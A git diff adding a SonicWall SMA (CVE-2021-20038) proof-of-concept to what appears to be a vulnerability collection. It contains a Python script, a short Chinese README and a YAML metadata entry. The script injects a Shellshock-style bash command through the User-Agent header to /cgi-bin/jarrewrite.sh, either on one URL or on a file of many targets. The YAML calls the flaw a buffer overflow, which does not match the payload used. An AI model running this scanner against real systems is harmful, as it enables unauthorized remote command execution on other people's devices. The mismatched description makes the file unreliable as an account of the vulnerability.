diff --git a/cve/SonicWall/2021/CVE-2021-20038/CVE-2021-20038.py b/cve/SonicWall/2021/CVE-2021-20038/CVE-2021-20038.py new file mode 100644 index 0000000000000000000000000000000000000000..158cde4a1feb893fc5db6c875ad65aebaa03a0bb --- /dev/null +++ b/cve/SonicWall/2021/CVE-2021-20038/CVE-2021-20038.py @@ -0,0 +1,68 @@ +import requests +import urllib3 +import sys +from urllib import parse + + +requests.packages.urllib3.disable_warnings() + +def banner(): + print('baby test') + +def help(): + print(' SonicWall RCE -h 查看帮助 ') + print(' SonicWall RCE -u 输入待检测url ') + print(' SonicWall RCE -f 输入待检测文件 ') + +def poc(url): + path="/cgi-bin/jarrewrite.sh" + vulnurl=url + path + #print(vulnurl) + headers = { + "User-Agent": "() { :; }; echo ; /bin/bash -c id", +} + try: + res=requests.get(vulnurl,headers=headers,verify=False,timeout=5) + if "id" in res.text and res.status_code==200: + print(res.text+url+"is vuln 漏洞存在") + else: + print(url+"is not vuln 漏洞不存在") + except Exception as e: + print(e) + +def poc1(files): + for url in open(files): + url=url.strip() + path="/cgi-bin/jarrewrite.sh" + vulnurl=url + path + #print(vulnurl) + headers = { + "User-Agent": "() { :; }; echo ; /bin/bash -c id", + } + try: + res=requests.get(vulnurl,headers=headers,verify=False,timeout=5) + if "id" in res.text and res.status_code==200: + print("[*] "+res.text+url+"is vuln 漏洞存在") + else: + print("[*] "+url+"is not vuln 漏洞不存在") + except Exception as e: + print(e) + +if __name__ == '__main__': + try: + banner() + print('by baby') + cmd1=sys.argv[1] + + if cmd1=='-h': + help() + elif cmd1=='-u': + cmd2=sys.argv[2] + poc(cmd2) + elif cmd1=='-f': + cmd2=sys.argv[2] + poc1(cmd2) + else: + print("请输入正确参数,或者-h查看帮助") + except: + print("输入-h查看帮助") \ No newline at end of file diff --git a/cve/SonicWall/2021/CVE-2021-20038/README.md b/cve/SonicWall/2021/CVE-2021-20038/README.md new file mode 100644 index 0000000000000000000000000000000000000000..8e3778dff37e6f1a8a91a54bb4f8b20d63e1cf23 --- /dev/null +++ b/cve/SonicWall/2021/CVE-2021-20038/README.md @@ -0,0 +1,9 @@ +# SonicWallSSL-VPN_RCE +CVE-2021-20038 + +命令行传参 +-h 查看帮助 +-u 指定url +-f 指定file文件 + +file内部的格式需添加http/https头 diff --git a/cve/SonicWall/2021/yaml/CVE-2021-20038.yaml b/cve/SonicWall/2021/yaml/CVE-2021-20038.yaml new file mode 100644 index 0000000000000000000000000000000000000000..bf946100f88dad533a65b1f307657072314da104 --- /dev/null +++ b/cve/SonicWall/2021/yaml/CVE-2021-20038.yaml @@ -0,0 +1,20 @@ +id: CVE-2021-20038 +source: https://github.com/vesperp/CVE-2021-20038-SonicWall-RCE +info: + name: + SonicWall安全移动接入(SMA)系列解决方案简化了端到端安全远程访问, 可跨本地, 云和混合数据中心访问托管的资源, 对应用程序实施策略访问控制, 在用户和设备标识之间建立信任关系, 之后可对应用进行多层安全控制, 让用户可随时随地安全工作. + severity: critical + description: + A Stack-based buffer overflow vulnerability in SMA100 Apache httpd server's mod_cgi module environment variables allows a remote unauthenticated attacker to potentially execute code as a 'nobody' user in the appliance. This vulnerability affected SMA 200, 210, 400, 410 and 500v appliances firmware 10.2.0.8-37sv, 10.2.1.1-19sv, 10.2.1.2-24sv and earlier versions. + scope-of-influence: + SMA 200, 210, 400, 410 and 500v firmware 10.2.0.8-37sv, 10.2.1.1-19sv, 10.2.1.2-24sv and earlier versions + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-20038#match-7894400 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-20038 + cwe-id: CWE-787, CWE-121 + cnvd-id: None + kve-id: None + tags: cve2021, Apache, RCE \ No newline at end of file diff --git a/other_list.yaml b/other_list.yaml index 3082ba010ce15c3ad13c12b30258832bc6d38371..7fba30d29cf812986ce6abe480711917b133ccfd 100644 --- a/other_list.yaml +++ b/other_list.yaml @@ -40,6 +40,8 @@ cve: apache-Struts: - CVE-2017-9805 - CVE-2018-11776 + SonicWall: + - CVE-2021-20038 unzip: - CVE-2022-0529 django: